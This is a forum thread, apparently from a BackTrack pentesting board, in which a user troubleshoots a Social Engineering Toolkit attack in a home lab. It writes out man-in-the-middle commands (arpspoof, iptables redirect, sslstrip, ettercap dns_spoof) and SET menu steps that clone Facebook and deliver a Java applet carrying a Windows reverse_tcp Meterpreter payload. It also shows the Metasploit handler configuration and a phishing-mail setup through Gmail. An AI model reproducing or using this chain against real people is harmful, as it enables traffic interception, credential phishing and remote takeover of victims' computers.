Results 1 to 5 of 5

Thread: Social Engineering Fake Website not showing up on Victims machine

Threaded View

  1. #1
    Junior Member
    Join Date
    Mar 2010
    Posts
    29

    Default Social Engineering Fake Website not showing up on Victims machine

    The attackers IP address is 192.168.1.100. When I enter the ip address (http://192.168.1.100) on the attackers machine the fake website shows up; however, when I enter the ip address (http://192.168.1.100) on my victim laptop and desktop computers, there is no website but a blank page.

    I've watched alot of tutorials and they didnt mention needing to ARP the victim computers for the website to appear. However, I tried this approach. So I went ahead and ARPed the victim computers and set up sslstrip with the following commands and the website shows up on my victim machines; however, metasploit does not seem to be listening to the interaction as I have accepted the java applet on my victim machines but there is no notification on the msf console.

    These are the commands that brought up the website on the victim comps at the 192.168.1.100 ip address but still did not work with the msfconsole

    echo "1" > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port
    python sslstrip.py -a
    arpspoof -i wlan0 -t [victim ip] [Router ip]
    ettercap -T -q -i wlan0 -P dns_spoof

    Note: I can do the attack completely without ettercap of course, but as soon as I take out sslstrip, the website stops loading again on the victims comp

    Here are the settings I've chosen for the website clone


    [!] Website Attack Vectors [!]

    1. Web Templates
    2. Site Cloner
    3. Custom Import
    4. Return to main menu

    Enter number (1-4): 2

    1. The Java Applet Attack Method
    2. The Metasploit Browser Exploit Method
    3. Credential Harvester Method
    4. Return to the previous menu

    Enter your choice (press enter for default): 1
    SET supports both HTTP and HTTPS
    Example: http://www.thisisafakesite.com
    Enter the url to clone: Welcome to Facebook


    Name: Description:

    1. Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker.
    2. Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker.
    3. Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker.
    4. Windows Bind Shell Execute payload and create an accepting port on remote system.
    5. Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline
    6. Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline
    7. Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter
    8. Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports
    9. Import your own executable Specify a path for your own executable

    Enter choice (hit enter for default): 2

    For the next option i choose the multiencoder number 15

    When it asks for Port to listen on I enter default of 443


    msf console opens:Nothing changes after I accept the java applet on my victim comp. This Test worked fine before...My hard drive has crashed since and now I cant duplicate the successful results.

    resource (src/program_junk/meta_config)> use exploit/multi/handler
    resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
    PAYLOAD => windows/meterpreter/reverse_tcp
    resource (src/program_junk/meta_config)> set LHOST 192.168.1.100
    LHOST => 192.168.1.100
    resource (src/program_junk/meta_config)> set LPORT 443
    LPORT => 443
    resource (src/program_junk/meta_config)> set ENCODING x86/countdown
    ENCODING => x86/countdown
    resource (src/program_junk/meta_config)> set ExitOnSession false
    ExitOnSession => false
    resource (src/program_junk/meta_config)> exploit -j[*] Exploit running as background job.
    [*] Started reverse handler on 192.168.1.100:443[*] Starting the payload handler...
    msf exploit(handler) >

    Conclusion: Website not showing on victims computers until ARP and sslstrip are introduced; however, metasploit does not seem to be able to hear when sslstrip is running. Possible IP table issue? Would appreciate your input...

    ***Edit: I have fixed the IP tables so that the website appears on the victims machine without ARPing the victims computer and using sslstrip simpy by rebooting. However, still nothing is happening with Metasploit still after I accept the Java applet. Any ideas what I'm leaving out?

    Update 2: The test seems to be working flawlessly on windows xp comps. I thought with the latest update that the software said that windows 7 was now vulnerable as well. Perhaps not. Sometimes Randomly the msf will announce it's sending but no sessions are created. Most of the time when I accept the java applet with my windows 7 laptop nothing happens at all.

    ***Another Engineering Social Toolkit Error I'm encountering is with sendmail which has a history of giving alot of beginners such as myself alot of problems. I've been reading up on it but I ran into the latest error of "Something went wrong, printing the error: (530: '5.7.0 MUST ISSUE A STARTTLS COMMAND FIRST . I am attempting to send with a Gmail account.
    Last edited by marthafocker; 04-18-2010 at 10:31 PM. Reason: Fixed Ip tables

Similar Threads

  1. Replies: 66
    Last Post: 11-25-2010, 04:17 PM
  2. Social Engineering at its best
    By muts in forum OLD BackTrack News
    Replies: 2
    Last Post: 02-28-2010, 01:37 PM
  3. Social Engineering - need some help
    By williamc in forum OLD Pentesting
    Replies: 27
    Last Post: 07-22-2008, 07:08 AM
  4. Social Engineering Questions
    By monsieurdozier in forum OLD Newbie Area
    Replies: 14
    Last Post: 03-26-2008, 09:44 PM
  5. Social Engineering
    By elazar in forum OLD General IT Discussion
    Replies: 0
    Last Post: 09-18-2007, 05:31 AM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •